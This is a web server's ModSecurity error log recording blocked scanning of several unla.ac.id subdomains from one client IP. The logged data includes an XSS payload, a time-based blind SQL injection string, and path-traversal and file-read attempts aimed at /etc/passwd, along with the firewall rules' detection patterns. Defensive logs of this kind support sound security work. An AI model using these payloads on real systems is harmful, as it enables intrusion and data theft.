[Tue Aug 29 11:41:09.288802 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sponsor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:sponsor: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.dhtml"] [unique_id "ZO125cCo-f0AAAc2dOAAAAAN"]
[Tue Aug 29 11:41:09.323560 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sponsor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:sponsor: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.dhtml"] [unique_id "ZO125cCo-f0AAAcYVAUAAAAp"]
[Tue Aug 29 11:41:09.326644 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sponsor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:sponsor: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.dhtml"] [unique_id "ZO125cCo-f0AAAc4EjEAAAAP"]
[Tue Aug 29 11:41:09.406617 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO125cCo-f0AAAc2dOQAAAAN"]
[Tue Aug 29 11:41:09.428224 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO125cCo-f0AAAcqJJUAAAAG"]
[Tue Aug 29 11:41:09.429008 2023] [:error] [pid 1843] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sponsor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:sponsor: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.dhtml"] [unique_id "ZO125cCo-f0AAAczXeAAAAAL"]
[Tue Aug 29 11:41:09.599331 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sponsor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:sponsor: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.dhtml"] [unique_id "ZO125cCo-f0AAAc2dOsAAAAN"]
[Tue Aug 29 11:41:09.625711 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO125cCo-f0AAAc36ssAAAAO"]
[Tue Aug 29 11:41:09.668711 2023] [:error] [pid 1843] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO125cCo-f0AAAczXeoAAAAL"]
[Tue Aug 29 11:41:09.672672 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO125cCo-f0AAAYMWVoAAAAR"]
[Tue Aug 29 11:41:10.375525 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:email: 2UdyWmaXpTq91nUrOZ0geHP3XoU@test.com' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO125sCo-f0AAAcoNSUAAAAF"]
[Tue Aug 29 11:41:10.385430 2023] [:error] [pid 1849] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:email: 2UdyWmaXpTq91nUrOZ0geHP3XoU@test.com' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO125sCo-f0AAAc5Sk4AAAAQ"]
[Tue Aug 29 11:41:10.398532 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:email: 2UdyWmaXpTq91nUrOZ0geHP3XoU@test.com' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO125sCo-f0AAAc36tAAAAAO"]
[Tue Aug 29 11:41:10.420005 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO125sCo-f0AAAc36tEAAAAO"]
[Tue Aug 29 11:41:10.424244 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:email: 2UdyWmaXpTq91nUrOZ0geHP3XoU@test.com' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO125sCo-f0AAAcqJJgAAAAG"]
[Tue Aug 29 11:41:10.439703 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:email: 2UdyWmaXpTq91nUrOZ0geHP3XoU@test.com' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO125sCo-f0AAAc36tIAAAAO"]
[Tue Aug 29 11:41:10.440318 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:csftyp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:csftyp: classic ssfile1=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/broker"] [unique_id "ZO125sCo-f0AAAYf-OEAAAAD"]
[Tue Aug 29 11:41:10.485161 2023] [:error] [pid 1849] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:csftyp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:csftyp: classic ssfile1=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/cgi-bin/broker"] [unique_id "ZO125sCo-f0AAAc5SlIAAAAQ"]
[Tue Aug 29 11:41:10.487111 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:csftyp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:csftyp: classic ssfile1=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/broker"] [unique_id "ZO125sCo-f0AAAc2dPMAAAAN"]
[Tue Aug 29 11:41:10.507079 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:csftyp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:csftyp: classic ssfile1=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/broker"] [unique_id "ZO125sCo-f0AAAc36tQAAAAO"]
[Tue Aug 29 11:41:10.511644 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:csftyp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:csftyp: classic ssfile1=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/broker"] [unique_id "ZO125sCo-f0AAAcqJJsAAAAG"]
[Tue Aug 29 11:41:11.363646 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:csftyp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:csftyp: classic ssfile1=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/broker"] [unique_id "ZO1258Co-f0AAAc36tUAAAAO"]
[Tue Aug 29 11:41:11.387267 2023] [:error] [pid 1842] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:email: 2UdyWmaXpTq91nUrOZ0geHP3XoU@test.com' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO1258Co-f0AAAcyp1oAAAAK"]
[Tue Aug 29 11:41:13.359870 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:certfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:certfile: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/cert_download.php"] [unique_id "ZO126cCo-f0AAAcoNTkAAAAF"]
[Tue Aug 29 11:41:13.381663 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:certfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:certfile: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/admin/cert_download.php"] [unique_id "ZO126cCo-f0AAAcoNToAAAAF"]
[Tue Aug 29 11:41:13.487700 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:certfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:certfile: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/admin/cert_download.php"] [unique_id "ZO126cCo-f0AAAYf-PcAAAAD"]
[Tue Aug 29 11:41:13.501493 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:certfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:certfile: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/admin/cert_download.php"] [unique_id "ZO126cCo-f0AAAaZ9osAAAAo"]
